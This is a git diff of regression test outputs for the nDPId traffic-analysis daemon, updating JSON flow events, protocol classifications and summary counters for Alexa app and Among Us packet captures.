00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976041680,"flow_last_seen":1490976168960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976030681,"flow_last_seen":1490976030890,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":7358,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00955{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00580{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":3435,"packets-processed":3406,"total-skipped-flows":0,"total-l4-payload-len":1226087,"total-not-detected-flows":0,"total-guessed-flows":14,"total-detected-flows":146,"total-detection-updates":141,"total-updates":2,"current-active-flows":0,"total-active-flows":160,"total-idle-flows":160,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1075,"global_ts_msec":1490976198776} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3435/3406 @@ -1081,9 +1081,9 @@ ~~ total active/idle flows...: 160/160 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6590189 bytes -~~ total memory freed........: 6590189 bytes -~~ total allocations/frees...: 122905/122905 +~~ total memory allocated....: 6723795 bytes +~~ total memory freed........: 6723795 bytes +~~ total allocations/frees...: 125666/125666 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 189 chars ~~ json string max len.......: 2122 chars diff --git a/test/results/among_us.pcap.out b/test/results/among_us.pcap.out index b464270a3..4fdb44392 100644 --- a/test/results/among_us.pcap.out +++ b/test/results/among_us.pcap.out @@ -2,8 +2,8 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 